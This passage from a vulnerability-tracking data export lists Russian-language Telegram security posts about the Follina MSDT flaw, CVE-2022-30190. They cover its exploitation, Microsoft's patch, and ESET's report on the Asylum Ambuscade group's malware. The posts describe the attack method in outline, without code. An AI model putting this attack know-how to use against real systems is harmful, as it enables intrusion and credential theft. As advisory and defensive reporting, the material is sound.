\u0412 \u0441\u0435\u0442\u0438 \u0443\u0436\u0435 \u0435\u0441\u0442\u044c \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0435\u043d\u0438\u0439, \u0447\u0442\u043e \u0434\u0430\u043d\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430\u0441\u044c \u043f\u0440\u0438 \u0430\u0442\u0430\u043a\u0430\u0445. \u042d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u0443\u0436\u0435 \u043f\u0440\u0438\u0432\u0435\u043b\u0438 \u043f\u0440\u0438\u043c\u0435\u0440 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430, \u043f\u0440\u043e\u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u0432 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0444\u0430\u0439\u043b Microsoft Word.\n\n\u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u044d\u0442\u043e\u0439 \u043e\u0448\u0438\u0431\u043a\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u0441 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 \u0432\u044b\u0437\u044b\u0432\u0430\u044e\u0449\u0435\u0433\u043e \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f. 
\u0421\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u0442 \u043a \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u043f\u043e\u043b\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f.\n\n\ud83d\uddde \u0411\u043b\u043e\u0433 \u041a\u043e\u0434\u0435\u0431\u0430\u0439\n\n#microsoft #vulnerability", "creation_timestamp": "2022-05-31T12:49:38.000000Z"}, {"uuid": "0b46dfd9-20f9-4be2-bf74-98c0fa5dc50a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/codeby_sec/6083", "content": "\u200b\ud83e\udda0 Microsoft \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Follina\n\nMicrosoft \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0432\u043c\u0435\u0441\u0442\u0435 \u0441 \u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c\u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435\u043c Windows \u0437\u0430 \u0438\u044e\u043d\u044c 2022 \u0433\u043e\u0434\u0430 \u0434\u043b\u044f \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f. \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0439 \u043a\u0430\u043a Follina. 
\u041e\u0448\u0438\u0431\u043a\u0430 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0432 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0449\u0438\u0445\u0441\u044f \u0430\u0442\u0430\u043a\u0430\u0445.\n\n\u00abMicrosoft \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442 \u043a\u043b\u0438\u0435\u043d\u0442\u0430\u043c \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u043f\u043e\u043b\u043d\u043e\u0439 \u0437\u0430\u0449\u0438\u0442\u044b \u043e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438. \u041a\u043b\u0438\u0435\u043d\u0442\u0430\u043c, \u0447\u044c\u0438 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043d\u044b \u043d\u0430 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439, \u043d\u0435 \u043d\u0443\u0436\u043d\u043e \u043f\u0440\u0435\u0434\u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0442\u044c \u043d\u0438\u043a\u0430\u043a\u0438\u0445 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0439\u00bb, \u2014 \u0433\u043e\u0432\u043e\u0440\u0438\u0442\u0441\u044f \u0432 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0438 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438.\n\n\u041e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u043c\u0430\u044f \u043a\u0430\u043a CVE-2022-30190, \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u043f\u0438\u0441\u0430\u043d\u0430 \u043a\u0430\u043a \u043e\u0448\u0438\u0431\u043a\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e 
\u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u043e\u0432 Microsoft Windows Support Diagnostic Tool (MSDT), \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0441\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u0432\u0441\u0451 \u0435\u0449\u0451 \u043f\u043e\u043b\u0443\u0447\u0430\u044e\u0449\u0438\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (Windows 7+, Windows Server 2008+).\n\n\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u044d\u0442\u0443 \u043e\u0448\u0438\u0431\u043a\u0443 \u0432 \u0441\u0432\u043e\u0438\u0445 \u0446\u0435\u043b\u044f\u0445, \u043c\u043e\u0433\u0443\u0442 \u0431\u0435\u0437 \u0442\u0440\u0443\u0434\u0430 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f. 
\u0422\u0430\u043a\u0436\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043c\u043e\u0436\u0435\u0442 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0434\u043b\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c, \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u0434\u0430\u043d\u043d\u044b\u0445 \u0438 \u0434\u0430\u0436\u0435 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u043d\u043e\u0432\u044b\u0445 \u0443\u0447\u0451\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0438\u0441\u0435\u0439.\n\n\u041c\u044b \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u043c \u0432\u0441\u0435\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u043a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0441\u043a\u043e\u0440\u0435\u0435 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043d\u043e\u0432\u043e\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043e\u0442 Microsoft.\n\n\ud83d\uddde \u0411\u043b\u043e\u0433 \u041a\u043e\u0434\u0435\u0431\u0430\u0439\n\n#microsoft #windows", "creation_timestamp": "2022-06-15T20:37:27.000000Z"}, {"uuid": "c1e21988-76a1-499d-9670-5b4c73e347f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/codeby_sec/6037", "content": "\u200bCVE-2022-30190. \u0420\u0430\u0437\u0431\u043e\u0440 MSDT \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438\n\n\u041f\u0440\u0438\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e, Codeby! 
\u0412 \u044d\u0442\u043e\u0439 \u0441\u0442\u0430\u0442\u044c\u0435 \u043c\u044b \u0440\u0430\u0437\u0431\u0435\u0440\u0435\u043c \u043a\u0430\u043a \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 CVE-2022-30190 \u0438 \u043d\u0430 \u043f\u0440\u0430\u043a\u0442\u0438\u043a\u0435 \u0438\u0441\u043f\u044b\u0442\u0430\u0435\u043c \u0434\u0430\u043d\u043d\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c. 27 \u043c\u0430\u044f \u043d\u0430 VirusTotal \u043f\u043e\u0441\u0442\u0443\u043f\u0438\u043b \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 Microsoft Office \u0441\u043e \u0441\u0442\u0440\u0430\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0432\u0440\u0435\u0434\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c, \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0431\u044b\u043b\u0430 \u043e\u043f\u043e\u0437\u043d\u0430\u043d\u0430 \u043a\u0430\u043a 0-day, \u0447\u0442\u043e \u0434\u0435\u043b\u0430\u043b\u043e \u0435\u0435 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u043e\u043f\u0430\u0441\u043d\u043e\u0439 \u0432 \u0430\u0442\u0430\u043a\u0430\u0445. \u0420\u0438\u0441\u043a \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0442\u043e\u043b\u044c\u043a\u043e \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u044b \u0441\u043e \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u044b\u043c \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u043e\u043c MSDT URI \u0438 \u0441 \u041e\u0421 Windows. 
\u0414\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0442\u0430\u043a-\u0436\u0435 \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u043c\u0430\u043a\u0440\u043e\u0441\u043e\u0432, \u0447\u0442\u043e \u0434\u0435\u043b\u0430\u0435\u0442 \u0430\u0442\u0430\u043a\u0443 \u0435\u0449\u0435 \u043b\u0435\u0433\u0447\u0435, \u0432\u0441\u0435 \u0447\u0442\u043e \u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u043c\u0443 - \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 \u044e\u0440\u043b \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c MSDT URI \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f powershell \u043a\u043e\u043c\u0430\u043d\u0434.\n\n\ud83d\udccc \u0427\u0438\u0442\u0430\u0442\u044c \u0441\u0442\u0430\u0442\u044c\u044e\n\n#cve #rce #windows", "creation_timestamp": "2022-06-08T17:42:42.000000Z"}, {"uuid": "28125cf5-cb6f-43b9-9551-ccf6e688d0fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/itsec_news/2680", "content": "\u200b\u26a1\ufe0f\u0425\u0430\u043a\u0435\u0440\u0441\u043a\u0430\u044f \u0433\u0440\u0443\u043f\u043f\u0430 Asylum Ambuscade \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u0441\u043e\u0447\u0435\u0442\u0430\u0435\u0442 \u0444\u0438\u043d\u0430\u043d\u0441\u043e\u0432\u0443\u044e \u043c\u043e\u0442\u0438\u0432\u0430\u0446\u0438\u044e \u0441 \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0430\u0436\u0435\u043c.\n\n\ud83d\udcac \u0413\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432, 
\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430\u044f \u043a\u0430\u043a Asylum Ambuscade, \u0437\u0430\u043d\u0438\u043c\u0430\u0435\u0442\u0441\u044f \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0430\u0436\u0435\u043c \u0438 \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u043e\u0441\u0442\u044c\u044e, \u0430\u0442\u0430\u043a\u0443\u044f \u043c\u0430\u043b\u044b\u0435 \u0438 \u0441\u0440\u0435\u0434\u043d\u0438\u0435 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443. \u042d\u0442\u0430 \u0433\u0440\u0443\u043f\u043f\u0430 \u0434\u0435\u0439\u0441\u0442\u0432\u0443\u0435\u0442 \u0441 2020 \u0433\u043e\u0434\u0430 \u0438 \u0431\u044b\u043b\u0430 \u0432\u043f\u0435\u0440\u0432\u044b\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0435\u0439 Proofpoint \u0432 \u043c\u0430\u0440\u0442\u0435 2022 \u0433\u043e\u0434\u0430.\n\n\u041f\u043e \u043d\u043e\u0432\u044b\u043c \u0434\u0430\u043d\u043d\u044b\u043c ESET, \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 Asylum Ambuscade \u0432 \u0441\u0432\u043e\u0438\u0445 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0445 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f\u0445 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0435 \u043f\u0438\u0441\u044c\u043c\u0430 \u0441 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c\u0438 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u044e\u0442 \u0437\u043b\u043e\u0432\u0440\u0435\u0434\u043d\u044b\u0439 VBScript-\u043a\u043e\u0434 \u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 
\u0434\u043b\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2022-30190. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u044b Sunseed, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442 \u0432\u0442\u043e\u0440\u0438\u0447\u043d\u044b\u0439 \u043c\u043e\u0434\u0443\u043b\u044c Ahkbot \u0441 C2-\u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432.\n\n\u0412 2023 \u0433\u043e\u0434\u0443 Asylum Ambuscade \u0440\u0430\u0441\u0448\u0438\u0440\u0438\u043b\u0430 \u0441\u0432\u043e\u044e \u0446\u0435\u043b\u0435\u0432\u0443\u044e \u0430\u0443\u0434\u0438\u0442\u043e\u0440\u0438\u044e, \u0430\u0442\u0430\u043a\u0443\u044f \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u0431\u0430\u043d\u043a\u043e\u0432, \u0442\u0440\u0435\u0439\u0434\u0435\u0440\u043e\u0432 \u043a\u0440\u0438\u043f\u0442\u043e\u0432\u0430\u043b\u044e\u0442, \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u043e\u0440\u0433\u0430\u043d\u044b \u0438 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u043c\u0430\u043b\u044b\u0435 \u0438 \u0441\u0440\u0435\u0434\u043d\u0438\u0435 \u0431\u0438\u0437\u043d\u0435\u0441\u044b \u0432 \u0421\u0435\u0432\u0435\u0440\u043d\u043e\u0439 \u0410\u043c\u0435\u0440\u0438\u043a\u0435, \u0415\u0432\u0440\u043e\u043f\u0435 \u0438 \u0426\u0435\u043d\u0442\u0440\u0430\u043b\u044c\u043d\u043e\u0439 \u0410\u0437\u0438\u0438.\n\nESET \u043e\u0442\u043c\u0435\u0447\u0430\u0435\u0442, \u0447\u0442\u043e \u0445\u0430\u043a\u0435\u0440\u044b \u0442\u0430\u043a\u0436\u0435 
\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u043d\u043e\u0432\u044b\u0435 \u0432\u0435\u043a\u0442\u043e\u0440\u044b \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u0443\u044e \u0440\u0435\u043a\u043b\u0430\u043c\u0443 Google, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u0435\u0440\u0435\u043d\u0430\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043d\u0430 \u0441\u0430\u0439\u0442\u044b \u0441 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c JavaScript-\u043a\u043e\u0434\u043e\u043c. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0441 \u043c\u0430\u0440\u0442\u0430 2023 \u0433\u043e\u0434\u0430 \u0445\u0430\u043a\u0435\u0440\u044b \u043d\u0430\u0447\u0430\u043b\u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u0442\u044c \u043d\u043e\u0432\u044b\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 Nodebot, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043f\u043e\u0440\u0442\u043e\u043c Ahkbot \u043d\u0430 Node.js.\n\n\u0412\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u0430\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430 \u043c\u043e\u0436\u0435\u0442 \u0434\u0435\u043b\u0430\u0442\u044c \u0441\u043a\u0440\u0438\u043d\u0448\u043e\u0442\u044b, \u0432\u044b\u0442\u0430\u0441\u043a\u0438\u0432\u0430\u0442\u044c \u043f\u0430\u0440\u043e\u043b\u0438 \u0438\u0437 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u043e\u0432 Internet Explorer, Firefox \u0438 Chromium, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0442\u044c \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u043f\u043b\u0430\u0433\u0438\u043d\u044b AutoHotkey \u043d\u0430 
\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u043e. \u042d\u0442\u0438 \u043f\u043b\u0430\u0433\u0438\u043d\u044b \u0438\u043c\u0435\u044e\u0442 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u0443\u044e \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u044c, \u0442\u0430\u043a\u0443\u044e \u043a\u0430\u043a \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0430 Cobalt Strike, \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 Chrome \u0434\u043b\u044f hVNC, \u0437\u0430\u043f\u0443\u0441\u043a \u043a\u0435\u0439\u043b\u043e\u0433\u0433\u0435\u0440\u0430, \u0440\u0430\u0437\u0432\u0451\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u0435 \u0438\u043d\u0444\u043e\u0441\u0442\u0438\u043b\u0435\u0440\u0430 Rhadamanthys, \u0437\u0430\u043f\u0443\u0441\u043a \u043a\u043e\u043c\u043c\u0435\u0440\u0447\u0435\u0441\u043a\u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e\u0433\u043e RAT \u0438 \u0434\u0440\u0443\u0433\u043e\u0435.\n\n\u041f\u043e \u043e\u0446\u0435\u043d\u043a\u0430\u043c ESET, Asylum Ambuscade \u0437\u0430\u0440\u0430\u0437\u0438\u043b\u0430 \u043e\u043a\u043e\u043b\u043e 4500 \u0436\u0435\u0440\u0442\u0432 \u0441 \u044f\u043d\u0432\u0430\u0440\u044f 2022 \u0433\u043e\u0434\u0430, \u0447\u0442\u043e \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u043f\u0440\u0438\u043c\u0435\u0440\u043d\u043e 265 \u0436\u0435\u0440\u0442\u0432 \u0432 \u043c\u0435\u0441\u044f\u0446. 
\u042d\u0442\u043e \u0434\u0435\u043b\u0430\u0435\u0442 \u0434\u0430\u043d\u043d\u0443\u044e \u0433\u0440\u0443\u043f\u043f\u0443 \u0432\u0435\u0441\u044c\u043c\u0430 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0439 \u0443\u0433\u0440\u043e\u0437\u043e\u0439 \u0434\u043b\u044f \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439 \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443.\n\n\u0426\u0435\u043b\u0438 \u0438 \u043c\u043e\u0442\u0438\u0432\u044b Asylum Ambuscade \u043f\u043e\u043a\u0430 \u043e\u0441\u0442\u0430\u044e\u0442\u0441\u044f \u043d\u0435\u044f\u0441\u043d\u044b\u043c\u0438. \u0425\u043e\u0442\u044f \u0445\u0430\u043a\u0435\u0440\u044b \u044f\u0432\u043d\u043e \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u044b \u043d\u0430 \u043a\u0440\u0438\u043f\u0442\u043e\u0432\u0430\u043b\u044e\u0442\u044b \u0438 \u0431\u0430\u043d\u043a\u043e\u0432\u0441\u043a\u0438\u0435 \u0441\u0447\u0435\u0442\u0430 \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0431\u044b\u043b\u0438, \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u0435 SMB-\u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439 \u043c\u043e\u0436\u0435\u0442 \u0442\u0430\u043a\u0436\u0435 \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0442\u044c \u043d\u0430 \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0430\u0436.\n\n\u0412\u043e\u0437\u043c\u043e\u0436\u043d\u043e, \u0445\u0430\u043a\u0435\u0440\u044b \u043f\u0440\u043e\u0434\u0430\u044e\u0442 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0441\u0435\u0442\u044f\u043c \u044d\u0442\u0438\u0445 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439 \u0434\u0440\u0443\u0433\u0438\u043c \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u0430\u043c \u0434\u043b\u044f \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, 
\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u0441\u043e\u0444\u0442\u0430, \u043e\u0434\u043d\u0430\u043a\u043e ESET \u043d\u0435 \u043d\u0430\u0448\u043b\u0430 \u043d\u0438\u043a\u0430\u043a\u0438\u0445 \u0434\u043e\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c\u0441\u0442\u0432 \u044d\u0442\u043e\u0439 \u0433\u0438\u043f\u043e\u0442\u0435\u0437\u044b.\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2023-06-10T07:56:00.000000Z"}, {"uuid": "0901c9ec-e50e-4fb8-96c5-051729927a35", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/HXnB78LZ993EnbGXdL2hofKwYDoKHSeDPKMDrtCNi3QDgzw", "content": "", "creation_timestamp": "2025-08-14T09:00:04.000000Z"}, {"uuid": "3c1cde3b-0369-456e-97a5-778c2b490edc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/malwarehunters/524", 